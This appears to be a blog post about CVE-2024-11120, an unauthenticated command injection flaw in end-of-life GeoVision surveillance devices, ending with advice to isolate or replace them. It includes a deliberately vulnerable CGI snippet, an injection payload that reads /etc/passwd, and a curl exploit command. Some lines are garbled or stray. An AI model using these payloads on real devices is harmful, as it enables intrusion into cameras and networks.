GeoVision, known globally for its video surveillance products, has left a critical vulnerability in some of its End-of-Life (EOL) devices. This flaw, identified as CVE-2024-11120, allows unauthenticated attackers to execute arbitrary system commands remotely—no login required.
In this post, I’ll break down what this vulnerability is, how it’s exploited, and what you should do if you have one of these devices. I'll keep it clear and straightforward, with code snippets and references so you get all the facts.
What Is CVE-2024-11120?
CVE-2024-11120 is a high-severity OS command injection vulnerability found in legacy GeoVision network devices. These products are no longer supported (“EOL”) and do not receive security patches—even for critical issues.
Attackers can send specially crafted HTTP requests to vulnerable devices to run arbitrary system commands. This can lead to full compromise: attackers can add users, install malware, eavesdrop on communications, and more.
Important: This flaw requires no authentication; anyone on the network (or sometimes the internet) can exploit it.
Vulnerable Products
While GeoVision has not published an exhaustive list, reports and security researchers indicate the following product lines are affected:
Some NVR (Network Video Recorder) appliances
If your device reached end-of-life prior to 2024—and it runs a web management interface—you should assume it’s affected.
Exploit Details and Sample Code
Attackers can exploit this bug by sending a specially crafted POST request to a CGI script running on the device. User-supplied data in one of the parameters is insufficiently sanitized and passed directly to the system shell.
For example, let's say /cgi-bin/some_feature.cgi accepts a parameter called user. The vulnerable code might look like this (hypothetical, based on common Python CGI backends):
# Hypothetical vulnerable CGI script
import os, cgi
form = cgi.FieldStorage()
user = form.getvalue('user')
os.system(f'ping -c 4 {user}')
The attacker could submit
user=;id;cat /etc/passwd;
This would cause the device to execute ping -c 4 ;id;cat /etc/passwd;, running both id and cat /etc/passwd—and returning results to the attacker.
Let's use curl (a command-line HTTP client) to exploit a vulnerable device at 192.168.1.100
curl -X POST "http://192.168.1.100/cgi-bin/some_feature.cgi"; -d "user=;id"
If successful, the device's web response would include the output of the id command, showing you have command execution.
Jack into camera feeds
Attackers commonly scan the internet for these device types and exploit them within minutes of discovery.
References
- NVD CVE-2024-11120 Entry
- GeoVision EOL Policy *(Note: GeoVision is unlikely to issue a patch or bulletin for EOL devices.)*
- Original Research by Orange Cyberdefense *(Translation needed for some readers.)*
Conclusion
CVE-2024-11120 is a textbook example of the risks posed by unpatched, unsupported network devices. The exploit is trivial and widely used in the wild.
If you see a GeoVision device on your network with web access, assume it’s *already* compromised. Take steps quickly to isolate or replace it, and spread the word—these “zombie” endpoints are now part of attackers’ toolkits.
Stay safe, and always keep an inventory of your IoT/OT devices and keep them up to date or isolated!
Exclusive for this post
Should you need help triaging vulnerable GeoVision devices, I recommend network segmentation or retire-and-replace—do not trust workarounds for unauthenticated command injection in EOL gear.
References
- CVE-2024-11120 | NVD
- Orange Cyberdefense Research
Let me know in the comments if you have questions or want to share your own experience with legacy device risks!
Timeline
Published on: 11/15/2024 02:15:17 UTC
Last modified on: 12/05/2024 15:30:58 UTC